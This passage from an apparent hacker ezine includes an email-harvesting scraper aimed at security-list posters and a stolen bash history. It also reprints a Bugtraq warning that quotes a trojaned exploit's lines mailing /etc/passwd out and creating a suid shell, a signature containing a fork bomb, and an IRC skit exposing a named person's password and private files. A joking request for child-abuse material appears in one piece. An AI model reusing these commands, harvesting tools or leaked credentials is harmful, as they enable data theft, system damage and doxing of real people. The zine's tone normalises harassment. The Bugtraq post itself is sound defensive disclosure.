void sendcmd(int fd,char *cmd)
{
write(fd,cmd,strlen(cmd));
write(fd,"\r\n\r\n",2);
}
int connecthost(void)
{
int fd;
fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(fd<0){
fprintf(stderr,"out of socketz... weird\n");
system("ps aux|egrep tron|mixter|felix");
exit(-1);
}
if(connect(fd,(struct sockaddr*)&sinz,sizeof(sinz))<0){
fprintf(stderr,
"cant connect to online.securityfocus.com...project mayhem successfully accomplished!\n");
exit(-1);
}
return fd;
}
/*f-fgetz*/
char* readline(int fd)
{
static char buf[8192];
char yo;
int i = 0;
memset(buf,0,sizeof(buf));
for(i=0;i<sizeof(buf)-1;i++){
if(read(fd,&yo,1)!=1)
return NULL;
buf[i]=yo;
if(buf[i]=='\r'||buf[i]=='\n')
{
while(1){
yo=recv(fd,&yo,1,MSG_PEEK);
if(yo!='\r'&&yo!='\n')
break;
}
return buf;
}
}
return buf;
}
/*grab d0x from postz*/
void checkpost(char *name)
{
int fd=connecthost();
char *l,*req,*ptr,*startemail,*startname,*startbox;
/*YO*///printf("DEBUG: CHECKING POST\n");
req=makeurl(name);
sendcmd(fd,req);
free(req);
l=readline(fd);
while(l!=NULL){
ptr=strstr(l,">Message-ID:<");
if(ptr==NULL) goto checkauthor;
ptr+=13;
ptr=strchr(ptr,'>');
if(ptr==NULL) goto checkauthor;
ptr++;
ptr=strchr(ptr,'>');
if(ptr==NULL) goto checkauthor;
while(*ptr&&*ptr!='@')
ptr++;
if(!*ptr) goto checkauthor;
ptr++;
startbox=ptr;
while(*ptr&&(isalnum(*ptr)||*ptr=='.'))
ptr++;
if(!*ptr) goto checkauthor;
*ptr=0;
/*s4n1tych3ck*/
if(strchr(startbox,'.')==NULL) goto heh;
printf("\t\tLAMER BOX: %s\n",startbox);
goto heh;
checkauthor:
ptr=strstr(l,">Author:<");
if(ptr==NULL) goto heh;
ptr+=10;
ptr=strstr(ptr,"mailto:");
if(ptr==NULL) goto heh;
ptr+=7;
startemail=ptr;
ptr=strchr(ptr,'"');
if(ptr==NULL) goto heh;
*ptr++=0;
ptr=strchr(ptr,'>');
if(ptr==NULL) goto heh;
startname=++ptr;
ptr=strchr(ptr,'<');
if(ptr==NULL) goto heh;
*ptr=0;
printf("\tLAMER: %s",startemail);
if(strlen(startname))
printf(" (%s)",startname);
printf("\n");
fflush(stdout);
heh:
l=readline(fd);
}
close(fd);
}
/*cykle thru ind3z p4g3z*/
char *letitrip(int fd)
{
char *l=readline(fd);
char *ptr,*start=NULL,*nexturl=NULL,*lamerpost;
while(l!=NULL){
/*YO*///printf("line = %s\n",l);
/*try p0stz first*/
#define SEKRETKEY "<td><div style="
ptr=strstr(l,SEKRETKEY);
if(ptr==NULL) goto nexttest;
ptr+=strlen(SEKRETKEY);
ptr=strchr(ptr,'>');
if(ptr==NULL) goto nexttest;
ptr=strstr(ptr,"href");
if(ptr==NULL) goto nexttest;
ptr+=4;
while (isspace(*ptr))ptr++;
if(*ptr!='=') goto nexttest;
ptr=strchr(ptr,'"');
if(ptr==NULL) goto nexttest;
ptr++;
lamerpost=ptr;
while (*ptr&&*ptr!='"')ptr++;
if(*ptr!='"') goto nexttest;
*ptr=0;
/*2 urlz 4 top1c, dont pick wrong 0ne*/
if(strstr(lamerpost,"threads")) goto nexttest;
checkpost(lamerpost);
goto heh;
nexttest:
/*or iz it the previ0us week*/
ptr=strstr(l,"<a href=");
if(ptr==NULL) goto heh;
ptr=strchr(ptr,'"');
if(ptr==NULL) goto heh;
ptr++;
start=ptr;
ptr=strchr(ptr,'"');
if(ptr==NULL) goto heh;
*ptr++=0;
ptr=strchr(ptr,'>');
if(ptr==NULL) goto heh;
ptr++;
if(strstr(ptr,"prev Week")==NULL) goto heh;
/*w0rd here iz the previ0uz week*/
if(nexturl==NULL)
nexturl=strdup(start);
heh:
l=readline(fd);
}
return nexturl;
}
int main (int argc,char **argv)
{
struct hostent *he;
int fd;
char *newurl,*startpoint;
if((argc>2)||((argc==2)&&(!strcmp(argv[1],"-h")))){
int i;
fprintf(stderr,
"l4m3rl1zt3r usage: %s <#>\nwhere # is a l4m3r k4t3g0ry,
defaultz 2 bugtraq\n\n",argv[0]);
fprintf(stderr,"l4m3r k4t3g0r1ez:\n");
fprintf(stderr,"-----------------\n");
for(i=0;i<sizeof(targets)/sizeof(struct target);i++)
fprintf(stderr,"%d\t%s\n",i,targets[i].lamercode);
exit(0);
}
if(argc==2){
int choice=atoi(argv[1]);
if(choice>=(sizeof(targets)/sizeof(struct target))){
fprintf(stderr,"s0rry kouldnt find specif1ed l4m3r...\n");
fprintf(stderr,
"there r many more lam3rz, ~el8 iz working ar0und"
" the cl0q 2 upd8 thiz program with the necessary 2385915 entriez.\n");
fprintf(stderr,"try a valid # tho\n");
exit(-1);
}
startpoint=targets[choice].url;
}
else
startpoint=BASE_CMD;
fprintf(stderr,"l4m3rl1zt3r v1.0\n");
fprintf(stderr,"by uncle m4v1s\n");
fprintf(stderr,"k0pyright (K) 2002 ~el8 research labz\n");
fprintf(stderr,"for help, try -h\n\n");
he = gethostbyname("online.securityfocus.com");
if(he==NULL){
fprintf(stderr,"cant resolve online."
"securityfocus.com...project mayhem successfully accomplished!\n");
exit(-1);
}
memset(&sinz,0,sizeof(sinz));
sinz.sin_family=AF_INET;
sinz.sin_port = htons(80);
memcpy(&sinz.sin_addr,he->h_addr,4);
fprintf(stderr,"acquiring t4rget l1zt...!\n");
fprintf(stderr,"begin l4m3r l1st tr4nsm1ss10n!\n");
printf("------------------------------\n");
fd=connecthost();
sendcmd(fd,startpoint);
printf("LAMER CHRONOLOGY: CURRENT\n");
fflush(stdout);
newurl=letitrip(fd);
close(fd);
if(newurl==NULL){
fprintf(stderr,"weird..some un3xpekt3d sh1t happened!\n");
exit(-1);
}
while(newurl!=NULL)
{
char*req;
fd=connecthost();
req=makeurl(newurl);
sendcmd(fd,req);
printdates(newurl);
free(newurl);
free(req);
newurl=letitrip(fd);
close(fd);
}
printf("-------------------------------------\n");
fprintf(stderr,"we h4v3 d3t3kt3d 4ll p0ss1bl3 l4m3rz!\n");
fprintf(stderr,"n0thing l3ft 2 d0..m4ybe ch3ck #!el8.\n");
fprintf(stderr,"-------------------------------------\n");
return 0;
}
[END_CUT] hitlist.c
.~e~----------------------------------------------------------~e~.
; *08* bronc buster busted -- RLoxley ;
`----------------------------------------------------------------'
Hey guys, this is RLoxley (Robin Hood of Loxley) from hackphreak.org.
I wanted to get my website in your ezine again, and tell everyone how
ethical hacking is the best hacking ever. I have included bronc's
bash history from one of my machines. Also, remember young hackers,
if you break into a system, tell the admin how to patch it, do a good
deed for society. If you hack any child porn people, turn them into
authorities and send all of the downloaded movie/picture evidence to
my personal account: rloxley@hackphreak.org. Stop child porn!
Here it is:
# cat .bash_history
ssh -l bronc 2600.com
ssh -l bronc 2600.com
w
ps aux|grep bronc
kill -9 24409 24424 24428
ps aux|grep bronc
w
telnet localhost
exit
ssh -l bronc 2600.com
w
telnet localhost
exit
w
ping succeed.net
traceroute succeed.net
su bogus
exit
ping succeed.net
w
-su
BitchX bronc irc.freei.net
traceroute succeed.net
w
telnet fingers
exit
su -
exit
ssh 2600.com
exit
vhosts
BitchX bronc -H openGL.3dlinux.com irc.core.com
BitchX
BitchX bronc -H openGL.3dlinux.com
BitchX bronc
ls
ls -l BitchX
whereis BitchX
ls -l /usr/local/bin/BitchX
cd /usr/local/bin
ls
ls -l|more
rm BitchX
su -
cd
BitchX bronc -H openGL.3dlinux.com irc.core.com
ifconfig
vhosts
BitchX bronc -H underpaid.sysadmins.com irc.core.com
exit
su -
exit
su -
exit
su -
exit
su -
exit
w
finger lusta
ps aux|more
ps aux|grep ftp
ftpusers
su -
ls
cd ~ftp
ls
cd pub
ls
ftp fingers
cd
exit
w
clear
exit
w
talk pt
ls
ls -l cygnus-20-full.exe
su -
exit
ifconfig
su -
exit
w
su -
su -
su
w
fingew luat
finger lusta
finger pt
cat /etc/suauth
grep bronc /etc/group
w
su -
grep root /etc/passwd
cat /etc/motfd
cat /etc/motd
cd /var/log
ls
grep su messages|tail
grep su messages|tail - 20
grep su messages|tail 30
grep su messages|tail -30
grep root messages|tail -30
ps aux|grep sendmail
finger pt
ssh fingers
ssh fingers
grep root messages|tail -30
grep root messages|grep su|tail -30
su -
su -
w
uptime
cd /etc
ls -l passwd
id
cd
ls
cd ap
ls
cd ..
ls
w
ssh lemon
ssh lemon
ssh gratefuk
ssh grateful
ssh grateful.org
su bogus
telnet grateful.org
ssh fingers
ssh fingers
exit
su -
more .profile
myvar
hour
myvar=`ifconfig|grep inet| awk -F: '{print $2}'`
su -
exit
man ftp
qcq
pico ftptest
mkdir test
touch test.X
./ftptest
chmod 777 ftptest
ftptest
pico ftptest
ftptest
pico ftptest
ftptest
pico ftptest
ftptest
mv test.X text.X
ftptest
cd test
ls
cat ftptest
cd ..
cat ftptest
rm ftptest
rm -rf test
rm text.X
exit
w
finger lusta
su -
exit
showmount
su -
exit
ssh -l eginorio ssh.cisco.com
ssh -l eginorio bigleague.cisco.com
ssh -l eginorio paullew-ultra.cisco.com
exit
cd /users
cd /home
ls
cd users/
ls
cd ../wheel/
ls
w
finger geoff
finger ficus
deluser
userdel
remuser
su -
exit
ls
ssh attrition.org
ssh 2600.com
exit
ssh 2600.com
exit
ssh 2600.com
w
exit
nslookup phalse.2600.com
nslookup phalse.2600.com
ssh shocking.com
exit
ssh attrition.org
ssh attrition.org
ssh attrition.org
exit
ssh 2600.com
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
xit
eixt
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
sh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh -l eginorio ssh.cisco.com
exit
ssh -l eginorio ssh.cisco.com
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org~
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
ssh attrition.org
exit
exit
ssh attrition.org
exit
pwd
ls
cd lemon/
ls
cd bronc/
ls
cd bb
ks
ls
cd ..
ls -l
cd code
ls
cd ..
ls
pwd
cd ..
ls -l
cd ..
ls -l
cd www
ls
ls l
cd ..
ls -l
cd ap
ls
ls -l
cd ..
cd code
ls
cd ..
ls -l
w
exit
ls
hosts
host
ifconfig -a
/sbin/ifconfig -a
cat /etc/host
cat /etc/hosts
cat /etc/host.conf
netstat -a
w
/sbin/ifconfig -a
nslookup 199.1.199.115
nslookup 199.1.199.114
nslookup 199.1.199.113
xaric --help
xaric -H underpaid.sysadmins.com
w
/sbin/ifconfig -a
nslookup 199.1.199.199
nslookup 199.1.199.122
nslookup 199.1.199.100
xaric -H 3dfxlinux.com
nslookup 199.1.199.101
nslookup 199.1.199.102
nslookup 199.1.199.103
xaric -H asskick.com
traceroute web2.sea.nwserv.com
whois nwserv.com
whois nwserv.com@whois.networksolutions.com
w
exit
ssh attrition.org
exit
ls
cd code/
ls
cd ..
ls
cd lame/
ls
less qpop.c
clear
exit
finger lusta
w
w
ifconfig -a
/usr/sbin/ifconfig 0a
/sbin/ifconfig -a
w
finger jamf
nslookup 209.107.55.2
ftp ftp.bitchx.org
ls
ls -l ircii-pana-75p3.tar.gz
w
host -l vhost.shocking.com
/hostname
hostname
BitchX
w
xaric bronc us.undernet.org
w
w
write jamf
w
w
w
w
w
w
w
write jamf
w
exit
w
w
write jamf
w
ps aux|grep jamf
w
exit
w
exit
w
exit
su-
underpaid
exit
w
exit
passwd
w
ftp localhost
ls
ls
ls
ls
ls -l ENSC.opx
passwd
w
ps aux|grep bronc
kill -9 13856
ls
ftp fingers.shocking.com
exit
w
finger jamf
exit
ls
cd co
cd code
ls
tar -tv ssh-1.2.25.tar.gz
cd ..
ls
cd lemon/
ls
ls -l
cd bronc/
sl
ls
cd code/
ls
cd ..
cd 0day/
l;s
ls
less sshdexp.c
cd
ls
cd ap/
ls
cd
exit
.~e~----------------------------------------------------------~e~.
; *09* lcamtuff helps ~el8 -- lcamtuf ;
`----------------------------------------------------------------'
To: BugTraq
Subject: yet another fake exploit making rounds
Date: Dec 20 2001 8:58PM
Author: Michal Zalewski <lcamtuf@coredump.cx>
Message-ID:
<Pine.LNX.4.42.0112202139180.18953-100000@nimue.bos.bindview.com>
Hello,
Most recent (third) issue of "el8" zine, available at http://el8.8m.com,
among other things claims to have a "0-day" dcron exploit, allegedely
coded by me and Rafal Wojtczuk (Nergal).
/*************************************************************************\
| ----====----====---- . . LOCAL DCRON EXPLOIT . . ----====----====---- |
| |
| brought to you by |
| |
| (C) Michal Zalewski <lcamtuf@ids.pl> . and . Nergal <nergal@icm.edu.pl> |
| |
| ----------------------------------------------------------------------- |
| Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] |
| ----------------------------------------------------------------------- |
| |
\*************************************************************************/
[...cut...]
This so-called exploit is already making rounds, not only in script kiddie
community, but also being run by many admins to test their boxes. I got
reports from several people letting me know "it did not work". I looked at
it, and it appears to be a very nicely crafted trojan horse. It does send
your /etc/passwd file to a fixed address your-address@mail.com (source
code suggests this is only a default, and can be changed by the victim,
but because of always true conditional expression, user-specified value is
overwritten later; this mailbox is probably valid and attended):
/.../
email_address=(char*)strdup(optarg);
break;
/.../
if(email_address) {
email_address=DEFAULT_EMAIL_ADDRESS;
}
/.../
fprintf(temp,"mail %s < /etc/passwd\n",email_address);
Other than that, this exploit will also create a suid copy of /bin/bash in
/tmp directory, named 'boomsh'. Even if it was not executed as root, it
still gives the attacker an opportunity to escalate privileges locally and
gain access to other accounts, perhaps after guessing at least one
password.
You probably do not want to run this exploit, the same applies to all
other exploits coming from untrusted sources =)
--
_____________________________________________________
Michal Zalewski [lcamtuf@bos.bindview.com] [security]
[http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};:
=-=> Did you know that clones never use mirrors? <=-=
http://lcamtuf.coredump.cx/photo/
.~e~----------------------------------------------------------~e~.
; *10* lyfestylez of the owned and lamest with jobe -- r0b1nleech;
`----------------------------------------------------------------'
PART ONE:
*** emmanuel'skidsex is now known as r0b1nleech ***
<r0b1nleech> Hello, and welcome to the lyfestylez of the owned and
+ lamest.
<jobe> yoyoyo
<r0b1nleech> Unlike in our previous episode, in which we interviewed
+ pm of sneakerz.org, our next guest, HAS BEEN OWNED (many times).
<jobe> dont do drugs!
<r0b1nleech> Everybody, welcome jobe!! jobe is also a w00w00 affiliate.
<r0b1nleech> Pardon jobe's behaviour, he just did a line of coke and some
+ heroin. Ok, what's this, he's wiggling his arms and flailing his legs.
<r0b1nleech> Oh nevermind he's raving, ok back to the subject at hand.
<jobe> hey everyone i am jobe, also known as, jbowie, or FATALIST OF BoW.
<r0b1nleech> What is your claim to fame?
<jobe> i have shells on numerous hacker boxes, i have been owned many times,
+ and i have been busted for hacking autonet.
<jobe> oh also i have a sparc, i coded a solaris login exploit (THANKS DUKE),
+ and i almost spoke at cansecwest. CULT HERO!
<r0b1nleech> As you can see we have a very skilled individual here.
<jobe> im also famous for w00giving, i wrote a cron exploit (fuck you vix)
<jobe> i also helped shok get laid!
<r0b1nleech> The list keeps going and going :)
<jobe> hey mom, pm, dr, jduck, w00w00, hert, teso, BoW!
<r0b1nleech> Shut the fuck up already or I'll drop your spools.
<jobe> ok.. sorry
<r0b1nleech> We'll be right back after these messages.
PART TWO:
<r0b1nleech> Ok jobe, show us around your hacker network.
<jobe> i would also like to state that dropstatd and udpshell are elite
<jobe> ok fine, lets checkout my HERT homedir first (yo gaius!)
$ ssh -l jobe np9.hert.org
jobe@np9.hert.org's password: abc123hert
! W3lKuM t0 H3Rt HaKr EmErGencY ReSP0nZe Te4M'z NeTw0rK !
! d0nt h4k, 0r h4ck uz, 0r g3t h4ck3d pl3aSe, itS B4D !
$ ls -al
drwxr-x--- 39 jobe jobe 6144 .
drwxr-xr-x 72 root wheel 1536 ..
drwx------ 3 jobe jobe 512 .BitchX
-rw-r--r-- 1 jobe jobe 0 .addressbook
-rw------- 1 jobe jobe 2285 .addressbook.lu
-rw-r--r-- 1 jobe jobe 6353 .bash_history
-rw-r--r-- 1 jobe jobe 667 .bash_profile
-rw-r--r-- 1 jobe jobe 651 .cshrc
drwx------ 2 jobe jobe 512 .gnupg
-rw-r--r-- 1 jobe jobe 255 .login
-rw-r--r-- 1 jobe jobe 160 .login_conf
-rw------- 1 jobe jobe 371 .mail_aliases
-rw-r--r-- 1 jobe jobe 105 .mailrc
-rw------- 1 jobe jobe 301 .mysql_history
-rw-r--r-- 1 jobe jobe 892212 .phoenix.away
-rw------- 1 jobe jobe 8192 .pine-debug1
-rw------- 1 jobe jobe 14247 .pine-debug2
-rw------- 1 jobe jobe 8633 .pine-debug3
-rw------- 1 jobe jobe 7415 .pine-debug4
-rw-r--r-- 1 jobe jobe 11450 .pinerc
-rw-r--r-- 1 jobe jobe 69 .profile
-rw------- 1 jobe jobe 65 .rhosts
-rw-r--r-- 1 jobe jobe 852 .shrc
drwxr-xr-x 2 jobe jobe 512 .ssh
-rw------- 1 jobe jobe 5316 .viminfo
-rw-r--r-- 1 jobe jobe 1003 .vimrc
-rw------- 1 jobe jobe 16384 .w00t;.swp
-rw------- 1 jobe jobe 1198086 2
drwx--x--x 2 jobe jobe 512 3wahas
-rw-r--r-- 1 jobe jobe 8356 3wahas-0.0.1.tar.gz
-rw------- 1 jobe jobe 68 4rkl.sh
-rw-r--r-- 1 jobe jobe 25974 7350854.c
-rw-rw-r-- 1 jobe jobe 29108 ADMmutate-0.8.4.tar.gz
drwxr-xr-x 9 jobe jobe 512 BSD
-rw------- 1 jobe jobe 1527808 BitchX-1.0c18.core
-rw------- 1 jobe jobe 12288 Bowie_Jonathan.doc
-r--r--r-- 1 jobe jobe 116408 CHANGES
-rw-r--r-- 1 jobe jobe 4781 Collector-1.0.tar.gz
-rw------- 1 jobe jobe 24064 Dear Customer.Terracava-Teamdoc.doc
-rw------- 1 jobe jobe 1638716 DiabloHack.exe
-rw-r--r-- 1 jobe jobe 90 FILE_ID.DIZ
drwx------ 3 jobe jobe 512 FreeBSD
-rw-r--r-- 1 jobe jobe 7655 Hunter-1.2.tar.gz
drwxr-xr-x 2 jobe jobe 512 ICMP-Tunnel_P4-1.0
-rw-r--r-- 1 jobe jobe 7011 ICMP-Tunnel_P4-1.0.tar.gz
-rw-rw-r-- 1 jobe jobe 20572160 IDA4.04.tar
-r--r--r-- 1 jobe jobe 4190 INSTALL
-rw-r--r-- 1 jobe jobe 11776 Jonathan_Bowie_Resume.doc
-rw-r--r-- 1 jobe jobe 84854 Lazlov1.01.tar.gz
drwx------ 2 jobe jobe 512 Mail
-rw------- 1 jobe jobe 15098359 Mailbox
-r--r--r-- 1 jobe jobe 26150 Makefile
-rw-r--r-- 1 jobe jobe 3881088 Mushroomhead_-_Born_Of_Desire.mp3
-r--r--r-- 1 jobe jobe 21567 OPTIONS
-rw------- 1 jobe jobe 944 OSDnew.c
-rw------- 1 jobe jobe 990 OSDump.c
-rw------- 1 jobe jobe 1224 OSDump.tar.gz
-rw-r--r-- 1 jobe jobe 1570944 Opie_and_Anthony_-_Steven_Lynch_-_Special_Olympics.mp3
-rw------- 1 jobe jobe 64240 Picture 17.jpg
-rw-r--r-- 1 jobe jobe 2252 README
-rw------- 1 jobe jobe 1056 README.osdump
-rw------- 1 jobe jobe 5326 README2.TXT
-rw------- 1 jobe jobe 7264 SKDoS%s%s%s
-rw-r--r-- 1 jobe jobe 6246 Searcher-8.0.tar.gz
-rw-r--r-- 1 jobe jobe 16744 Smeagol-4.4.4.tar.gz
-rw-r--r-- 1 jobe jobe 1570944 Special_Olympics.mp3
-rw-r--r-- 1 jobe jobe 13547520 System_Of_A_Down.tar
-r--r--r-- 1 jobe jobe 10156 TODO
-rw-r--r-- 1 jobe jobe 2091383 Theyre_Coming_To_Take_Me_Away.mp3
-rw-rw-r-- 1 jobe jobe 1285708 U4CERT1.WAV
-rw-rw-r-- 1 jobe jobe 4077144 U4CERT2.WAV
-rw-r--r-- 1 jobe jobe 2055 UnderDC.txt
-rw-r--r-- 1 jobe jobe 13506560 WildPackets.AiroPeek.v1.0_Win9xNT2K-DOD.tar
-rw------- 1 jobe jobe 63583 WinSCPv0.1b.zip
-rw------- 1 jobe jobe 4712086 anet.tar.gz
-rw------- 1 jobe jobe 52981760 aux88-electro_boogie.tar
-rw-r--r-- 1 jobe jobe 17301 bfx.c
-rwxr-xr-x 2 jobe jobe 512 bin
-rw-r--r-- 1 jobe jobe 477 bind-4.9.6-REL.tar.gz
-rw-r--r-- 1 jobe jobe 2003579 bind-4.9.7-REL.tar.gz
-rw------- 1 jobe jobe 465 blah
-rw------- 1 jobe jobe 23 blah.c
-rw------- 1 jobe jobe 6039 blah.htm
-rw------- 1 jobe jobe 958 blahg
-rw-rw-r-- 1 jobe jobe 12330 bll
-rw-r--r-- 1 jobe jobe 428 blurb
-rw------- 1 jobe jobe 0 boo
-rw-r--r-- 1 jobe jobe 6204 breal_sm.jpg
-rw------- 1 jobe jobe 16701 bud.jpg
-rw-rw-r-- 1 jobe jobe 1998216 c06-snmpv1-req-app-r1.jar
-rw-rw-r-- 1 jobe jobe 18749 c06-snmpv1-req-enc-r1.jar
-rw-r--r-- 1 jobe jobe 27989 cardSelection.pdf
-rw-r--r-- 1 jobe jobe 68997120 carlin.tar
-rw------- 1 jobe jobe 416 cc1.cc
-rw------- 1 jobe jobe 884 cc2.cc
-rw-r--r-- 1 jobe jobe 83690221 cde-src.tar.gz
-rw------- 1 jobe jobe 564624 cdrtools-1.9a03-win32-bin.zip
-rw-r--r-- 1 jobe jobe 1563 cgixperl.sh
-rw-r--r-- 1 jobe jobe 4483 cgs.c
-rw-r--r-- 1 jobe jobe 220133 charmaps-0.0.tar.gz
-rw-r--r-- 1 jobe jobe 1797 cl.pl
-rw-r--r-- 1 jobe jobe 3339 clear-1.3.tar.gz
-rw-r--r-- 1 jobe jobe 10596 cmctlSparc
-rw-r--r-- 1 jobe jobe 1309 cmctlSparc.c
drwx------ 2 jobe jobe 512 cmsd
-rw------- 1 jobe jobe 6954 cmsd-horizon.tar.gz
-rw-r--r-- 1 jobe jobe 1872 cnt-svr-filetransfer.tar.gz
drwxr-xr-x 5 jobe jobe 512 compat
drwxr-xr-x 3 jobe jobe 512 conf
drwxr-xr-x 28 jobe jobe 512 contrib
-rwx------ 1 jobe jobe 16384 cpkey.exe
-rw-r--r-- 1 jobe jobe 142 cpu
-rw-r--r-- 1 jobe jobe 16126 crash_1.gz
-rw-r--r-- 1 jobe jobe 16126 crash_2.gz
-rw-r--r-- 1 jobe jobe 16126 crash_3.gz
-rw-r--r-- 1 jobe jobe 16126 crash_4.gz
-rw-r--r-- 1 jobe jobe 16126 crash_5.gz
-rw-r--r-- 1 jobe jobe 16126 crash_6.gz
-rw-r--r-- 1 jobe jobe 2032769 daemon.xpm
-rw-r--r-- 1 jobe jobe 1438 daemonshell.tar.gz
-rw------- 1 jobe jobe 573 dead.letter
-rw-r--r-- 1 jobe jobe 14763 deefaced.jpg
-rw-r--r-- 1 jobe jobe 3437 discover.c
-rw-r--r-- 1 jobe jobe 557056 dm_vmw301.zip
drwxr-xr-x 6 jobe jobe 512 doc
-rwx------ 1 jobe jobe 32768 dropstat
-rw-r--r-- 1 jobe jobe 2368 dstatd.c
-rw-r--r-- 1 jobe jobe 2122 dtcrash1.pl
-rw-r--r-- 1 jobe jobe 2110 dtcrash2.pl
-rw-r--r-- 1 jobe jobe 2110 dtcrash2.pl.494
-rw-r--r-- 1 jobe jobe 31569 dtfuck.c
-rw-r--r-- 1 jobe jobe 31433 dtspcd_ex_v4.c
-rw------- 1 jobe jobe 20050 elfvirii.tar.gz
-rw-r--r-- 1 jobe jobe 4820 epcs2.c
-rw-r--r-- 1 jobe jobe 4820 epcs2.c.773
-rw-r--r-- 1 jobe jobe 4820 epcs2_fix.c
-rwxr-xr-x 1 jobe jobe 5355 er
-rw-r--r-- 1 jobe jobe 10074 errors
-rw-r--r-- 1 jobe jobe 13357 ex_sol8_login_x86.c
-rw-r--r-- 1 jobe jobe 753 exdt-h.txt
-rw-r--r-- 1 jobe jobe 1045 exec_race.c
drwxrwxr-x 2 jobe jobe 1024 fbsd-src
drwxr-xr-x 3 jobe jobe 512 fingerd-fileserver
-rw-r--r-- 1 jobe jobe 2937 fingerd-fileserver.tar.gz
-rw------- 1 jobe jobe 7126 flyswatter.c
-rw-r--r-- 1 jobe jobe 231237 foo.jpg
-rw------- 1 jobe force 20992 forbowie.doc
-rw------- 1 jobe jobe 24655 forbowie.jpg
drwx------ 6 jobe jobe 512 frequency
-rw-r--r-- 1 jobe jobe 70090 frequency.tar.gz
-rw-r--r-- 1 jobe jobe 17374 fuck.ico
-rw-r--r-- 1 jobe jobe 3209 g.c
-rw------- 1 jobe jobe 499200 gzip-solaris-2.6-sparc
-rw-r--r-- 1 jobe jobe 74 haha
-rwxrwxr-x 1 jobe jobe 5005 hair
-rw-rw-r-- 1 jobe jobe 477 hair.c
-rw------- 1 jobe jobe 22481 hellkit-1.2.tar.gz
-rw-r--r-- 1 jobe jobe 1129880 hellodownthere.mpeg
-rw-rw-r-- 1 jobe jobe 1635 here.txt
-rw------- 1 jobe jobe 15 home.ip
-rw-r--r-- 1 jobe jobe 11028 hooklive.c
-rw-r--r-- 1 jobe jobe 3133 ia64-linux-execve.cs
-rw-r--r-- 1 jobe jobe 1735738 iheartyp
drwxr-xr-x 3 jobe jobe 512 include
-rw-rw-r-- 1 jobe jobe 772 install.sh
-rwxrwxr-x 1 jobe jobe 786028 irc
-rw------- 1 jobe jobe 1413120 irc.core
-rw------- 1 jobe jobe 3314 irc.log.#phrack
drwxrwxr-x 9 jobe jobe 1024 ircii-2.9
-rw-rw-r-- 1 jobe jobe 530294 ircii-2.9-roof.tar.gz
-rw------- 1 jobe jobe 6649 irclog.ex
-rw------- 1 jobe jobe 5593056 irclog.ex.#!teso
-rw------- 1 jobe jobe 2619481 irclog.ex.#!wutang
-rw-rw-r-- 1 jobe jobe 18749 j@24.128.147.68
-rw-r--r-- 1 jobe jobe 123738 j@pot.star.delta9-tetrahydrocannabinol.net
-rw------- 1 jobe jobe 12288 jbowie_resume.doc
-rw-rw-r-- 1 jobe jobe 11 joel.num
-rw------- 1 jobe jobe 13333 kain.jpg
drwxr-xr-x 2 jobe jobe 512 kfb
-rw------- 1 jobe jobe 1812 kfb.tar.gz
-rw-rw-r-- 1 jobe jobe 138 kotter.sults
drwx------ 2 jobe jobe 512 ldv3
drwx------ 3 jobe jobe 512 ldv6
-rw------- 1 jobe jobe 233325 libnet.tar.gz
-rw-r--r-- 1 jobe jobe 6605 license.dat
-rw-r--r-- 1 jobe jobe 17391 linspy-for-2.2.x.tgz
-rw-rw-r-- 1 jobe jobe 5465996 linux-2.2.16.tar.gz
-rw------- 1 jobe force 1978 lolita.c
-rw------- 1 jobe jobe 14065 lsd.telnet
-rw-r--r-- 1 jobe jobe 73338 m00
drwx------ 2 jobe jobe 512 mail
drwxr-xr-x 2 jobe jobe 512 man
-rw-r--r-- 1 jobe jobe 46669824 miabang01.mpeg
-rwx------ 1 jobe jobe 48735 modctl.c
-rw------- 1 jobe jobe 369012 more.core
-rw-r--r-- 1 jobe jobe 123738 multiscan-0.8.5.tar.gz
-rwxrwxr-x 1 jobe jobe 1192226 mutt
drwxrwxr-x 9 jobe jobe 5120 mutt-1.2.5
-rw-r--r-- 1 jobe jobe 1973923 mutt-1.2.5i.tar.gz
-rwx--x--x 1 jobe jobe 1198086 mutt2
-rw------- 1 jobe jobe 1696777 n4pst3r.exe
-rw-rw-r-- 1 jobe jobe 1738 n4rf
drwxr-xr-x 2 jobe jobe 1024 named
-rw------- 1 jobe jobe 2581 netbackup_exec.pl
-rw------- 1 jobe jobe 1143664 new.mp3
-rw-r--r-- 1 jobe jobe 10061 newhert.txt
-rw-r--r-- 1 jobe jobe 282701 odbc.doc.tar.gz
-rw-r--r-- 1 jobe jobe 293 optyx.stuff
-rw-r--r-- 1 jobe jobe 1527342 outfile
-rw-r--r-- 1 jobe jobe 1527342 outfile
-rw-r--r-- 1 jobe jobe 58593 patch-1.2.5.rr.compressed.1
drwxr-xr-x 2 jobe jobe 512 paz-1.0
-rw-r--r-- 1 jobe jobe 1684 paz-1.0.tar.gz
-rw------- 1 jobe jobe 7704 pc_sice3.zip
-rw-r--r-- 1 jobe jobe 338 pcic.out
-rw------- 1 jobe jobe 7918 pcnfsd-priv.tar.gz
drwx------ 2 jobe jobe 512 pcnfsd_remote
-rw------- 1 jobe jobe 142046 penguins.zip
-rw------- 1 jobe jobe 161242 pf.irc
-rw------- 1 jobe jobe 72171 phear-r0ute.gif
-rw------- 1 jobe jobe 2595 pomah.sh
-rw------- 1 jobe jobe 0 postponed
